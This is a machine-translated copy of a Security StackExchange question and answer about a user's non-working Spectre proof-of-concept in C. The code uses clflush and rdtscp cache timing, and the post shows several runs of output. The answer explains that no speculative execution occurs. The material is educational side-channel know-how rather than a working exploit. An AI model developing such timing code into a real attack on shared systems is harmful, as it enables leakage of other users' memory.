光谱PoC -基于纸张的相反结果
光谱PoC -基于纸张的相反结果
提问于 2018-01-18 08:56:52
经过长时间的讨论,这个问题(谢谢帮助!)
提出了基于谱纸的简单PoC。
似乎是一致的,也尝试了与其他字符,并得到了类似的结果。
处决:
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: E time: 96
trying: X time: 93
trying: W time: 93
trying: F time: 93
trying: O time: 93
trying: J time: 93
trying: C time: 93
trying: K time: 93
trying: Y time: 93
trying: T time: 93
trying: D time: 93
trying: M time: 93
trying: L time: 93
trying: P time: 93
trying: Q time: 93
trying: A time: 93
trying: B time: 93
trying: V time: 93
trying: N time: 93
trying: I time: 93
trying: U time: 93
trying: S time: 93
trying: H time: 93
trying: G time: 93
trying: Z time: 8152
trying: R time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: R time: 96
trying: X time: 92
trying: F time: 93
trying: O time: 93
trying: C time: 93
trying: P time: 93
trying: W time: 93
trying: U time: 93
trying: H time: 93
trying: T time: 93
trying: G time: 93
trying: Z time: 259
trying: K time: 93
trying: V time: 93
trying: J time: 93
trying: D time: 96
trying: M time: 93
trying: Q time: 93
trying: L time: 93
trying: E time: 93
trying: B time: 93
trying: S time: 93
trying: A time: 93
trying: Y time: 93
trying: N time: 93
trying: I time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: S time: 97
trying: W time: 93
trying: C time: 93
trying: V time: 93
trying: K time: 93
trying: P time: 93
trying: T time: 93
trying: Y time: 93
trying: A time: 93
trying: U time: 93
trying: N time: 93
trying: D time: 93
trying: O time: 93
trying: J time: 93
trying: R time: 93
trying: M time: 93
trying: F time: 93
trying: Q time: 93
trying: G time: 93
trying: H time: 93
trying: I time: 93
trying: E time: 93
trying: B time: 93
trying: Z time: 230
trying: L time: 93
trying: X time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: B time: 97
trying: A time: 93
trying: P time: 93
trying: I time: 93
trying: M time: 93
trying: E time: 93
trying: W time: 93
trying: H time: 93
trying: V time: 93
trying: D time: 93
trying: N time: 93
trying: Y time: 93
trying: T time: 93
trying: K time: 93
trying: J time: 93
trying: X time: 93
trying: R time: 93
trying: S time: 93
trying: L time: 93
trying: U time: 93
trying: G time: 93
trying: C time: 93
trying: Z time: 328
trying: O time: 93
trying: Q time: 93
trying: F time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: B time: 97
trying: G time: 93
trying: O time: 93
trying: X time: 93
trying: N time: 93
trying: F time: 93
trying: A time: 93
trying: Q time: 93
trying: Y time: 93
trying: M time: 93
trying: S time: 93
trying: K time: 93
trying: I time: 93
trying: W time: 93
trying: J time: 93
trying: R time: 93
trying: C time: 93
trying: V time: 93
trying: L time: 93
trying: Z time: 272
trying: P time: 93
trying: U time: 93
trying: H time: 92
trying: T time: 93
trying: E time: 93
trying: D time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: R time: 97
trying: A time: 95
trying: M time: 153
trying: F time: 95
trying: H time: 93
trying: L time: 93
trying: D time: 92
trying: G time: 93
trying: K time: 93
trying: U time: 93
trying: S time: 93
trying: W time: 93
trying: O time: 97
trying: Y time: 93
trying: Z time: 289
trying: C time: 93
trying: P time: 93
trying: Q time: 100
trying: B time: 92
trying: J time: 92
trying: I time: 92
trying: V time: 95
trying: E time: 93
trying: X time: 93
trying: T time: 93
trying: N time: 93
user@laptop:~/labspectre$ ./spectre7
Z should be cached
trying: P time: 98
trying: I time: 93
trying: F time: 93
trying: L time: 93
trying: W time: 93
trying: D time: 93
trying: V time: 93
trying: S time: 93
trying: H time: 93
trying: J time: 93
trying: K time: 93
trying: M time: 93
trying: O time: 93
trying: A time: 93
trying: Z time: 363
trying: X time: 93
trying: C time: 93
trying: Y time: 93
trying: E time: 93
trying: Q time: 93
trying: B time: 93
trying: R time: 93
trying: N time: 93
trying: T time: 93
trying: U time: 93
trying: G time: 93样品光谱PoC
#include
#include
#include
#include
#ifdef _MSC_VER
#include /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include /* for rdtscp and clflush */
#endif
void main(void)
{
volatile uint8_t array1[26] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 };
uint8_t array2[256 * 512];
for(int i = 0; i < sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
for(int i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
printf("%c should be cached\n", array1[25]);
int dummy = 0;
for(int i=0; i<26; i++) {
if (i != 25) {
array2[array1[i] * 512] = array1[i];
}
}
int t0,time_taken = 0;
int junk = 0;
int mix_i=0;
int i,j;
int aux,res;
char RandomId[26];
char ListId[26]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90};
srand(time(NULL));
for(i=0; i<26; i++)
{
res = rand() % 26;
aux = ListId[res];
if (ListId[res] != -1)
{
RandomId[i] = aux;
ListId[res] = -1;
}
else
i--;
}
volatile uint8_t * addr;
int y=0;
for(int i=0; i<26; i++)
{
mix_i = RandomId[i];
addr = &array2[mix_i * 512];
t0 = __rdtscp(&junk);
junk = *addr;
time_taken = __rdtscp(&junk) - t0;
if(mix_i>=65 && mix_i<=90)
printf("trying: %c time: %i\n",mix_i,time_taken);
}
}然而,我最大的问题是:
这有什么问题吗?我的错误在哪里?
因为它显示出缓存(推测加载)值的更高的访问时间?
我正在运行AMD A10-5757M处理器。
回答 1
Security用户
回答已采纳
发布于 2018-01-18 09:06:49
你在这里把数组从缓存中清除出来-
for(int i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */然后你把它拉回缓存中
for(int i=0; i<26; i++) {
if (i != 25) {
array2[array1[i] * 512] = array1[i];
}
}这表明,对于I == 25,if分支没有被占用(即不是投机性地执行)。数组中的其他每个页面都是缓存的,但是“Z”引用的页面没有缓存。
正如我在前面的问题中所说的,你真的需要了解你试图复制的概念的证据是如何工作的,然后你才能得到任何东西。
至于为什么没有投机性的处决,有很多可能性。例如,您还没有尝试过对分支机构进行大量的培训。编译器或处理器也可能优化出!= 25,只减少"i < 26“语句。
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://security.stackexchange.com/questions/177880
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号